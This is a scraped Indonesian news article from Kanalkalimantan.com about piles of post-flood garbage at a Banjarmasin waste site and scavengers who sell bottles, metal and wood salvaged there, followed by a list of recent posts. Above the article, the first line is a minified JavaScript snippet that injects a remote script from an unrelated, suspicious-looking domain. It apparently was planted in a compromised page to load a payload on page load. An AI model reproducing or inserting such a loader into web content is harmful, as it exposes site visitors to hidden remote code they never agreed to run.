(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Gunungan Sampah Pasca Banjir di TPS ‘Masalah’ bagi Pemko, Di Tangan Pemulung Dirupiahkan


KANALKALIMANTAN.COM, BANJARMASIN – Pasca banjir di Kota Banjarmasin sampah menjadi masalah sendiri bagi Pemerintah Kota (Pemko) Banjarmasin. Tapi bagi para pemulung gunung-gunung sampah produksi warga kota Seribu Sungai menjadi berkah sendiri bagi mereka.

Seperti dari pantauan Kanalkalimantan.com di tempat pembuangan sementara (TPS) jalan Veteran tepatnya pertigaan Sungai Lulut dengan Jalan Pramuka, para pemulung mengais barang berharga yang bisa dirupiahkan dari tumpukan sampah.

Di tengah tumpukan barang yang oleh warga dinilai tak berguna, botol plastik, besi dan barang lainnya masih dimanfaatkan dan dijadikan rupiah oleh pemulung.

Sarniah (60), salah satu pemulung mengatakan kepada Kanalkalimantan.com, sengaja datang ke TPS di pertigaan Jalan Veteran-Sungai Lulut-Jalan Pramuka untuk mencari botol plastik dan barang lainnya yang bisa laku dijual.

 

Para pemulung mencari benda-benda yang masih bisa dijual di TPS Jalan Veteran Banjarmasin, Sabtu (6/2/2021). Foto: putra

“Biasanya keliling dari tempat sampah satu ke tempat yang lain, tapi beberapa hari ini mencari botol plastik dan barang lainnya makin banyak di sini, apalagi setelah banjir,” tutur Sarniah, Sabtu (6/2/2021) siang.

Diakuinya, saat hari biasa berkeliling kadang hanya mendapatkan sekitar 20 kilogram plastik. Nah, pasca banjir ini, dari tumpukan sampah per hari, Sarniah mengaku bisa membawa pulang lebih dari 50 Kilogram botol plastik . “Bila dijual per kilogramnya Rp 2000,” katanya.

“Satu harinya bisa bawa pulang Rp150-100 ribu, beda saat keliling mencari yang hanya mendapatkan sekitar 70-50 ribu, dari hasil jual botol plastik,” ungkap Sarniah.

Pemulung lainnya, Sugito (45) yang khusus mencari besi, aluminium dari tumpukan sampah mengaku beruntung dengan adanya tumpukan sampah pasca banjir di Banjarmasin.

“Per hari bisa bisa membawa ke pengepul besi dan alumanium sekitar 70-80 Kilogram, dijual Rp 2.000 perkilogram. Sekitar Rp 140.000-200.000 yang bisa saya dapat,” aku Sugito.

Masih dari pantauan Kanalkalimantan.com, petugas pembuangan sampah dari komplek atau lingkungan RT yang hendak membuang ke TPS, para pemulung tak segan segan mencari langsung ke atas gerobak. Terkadang mereka ikut membantu untuk menurunkan sampah ke TPS.

Selain pemulung yang mencari rezeki dari tumpukan sampah ini, rupanya juga di manfaatkan oleh warga lainya untuk mencari barang- barang rumah tangga yang masih bisa dipergunakan, salah satunya puing- puing kayu rumah yang dibuang warga.

“Entah apa alasanya di tumpukan sampah ada kayu papan yang dibuang orang, tapi itu masih bisa dipakai sebenarnya,” kata Irawan (32) kepada Kanalkalimantan.com. Ia sengaja mengambil puing-puing kayu untuk memperbaiki rumahnya sendiri yang rusak akibat banjir.

Sekadar diketahui, Dinas Lingkungan Hidup (DLH) Kota Banjarmasin menyebutkan volume sampah naik sebanyak 25 ton per hari akibat banjir. (kanalkalimantan.com/putra)

 

Reporter : Putra
Editor : Bie

 

 

 

 

 


Al Ghifari

Recent Posts

Jalinan Erat Silaturahmi Warga Sungai Besar dari Budaya Banjar “Balogo”

KANALKALIMANTAN.COM, BANJARBARU – Suasana riuh diiringi tawa gembira warga baik tua, muda, hingga anak-anak, larut… Read More

15 jam ago

Pelantikan Pengurus Wilayah Keluarga Besar PII Kalsel

KANALKALIMANTAN.COM, BANJARMASIN – 4 Mei diperingati Hari Bangkit (Harba) organisasi pelajar tertua di Tanah Air,… Read More

16 jam ago

Lesti Kejora Hingga Ria Ricis Siap Ramaikan Silet Awards 2024!

KANALKALIMANTAN.COM, - Ajang penghargaan paling dramatis dan paling sensasional yang ditunggu masyarakat, Silet Awards 2024… Read More

17 jam ago

Kontes Motor 2Tak “Entwosiastrokes Volume 2 2024” di Banjarbaru, Ajang Adu Para Modifikator Banua

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin mengapreasiasi penyelenggaraan event kontes motor "Entwosiastrokes… Read More

18 jam ago

Kali Pertama Airbus A340 Layani Jemaah Haji Embarkasi Banjarmasin

Penerbangan Kloter 1 Sempat Terlambat 30 Menit Read More

21 jam ago

100 Peserta Ramaikan Kejuaraan Catur se Kalteng Piala Pj Bupati Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Kejuaraan catur piala Pj Bupati Kapuas se Kalimantan Tengah dibuka oleh… Read More

1 hari ago

This website uses cookies.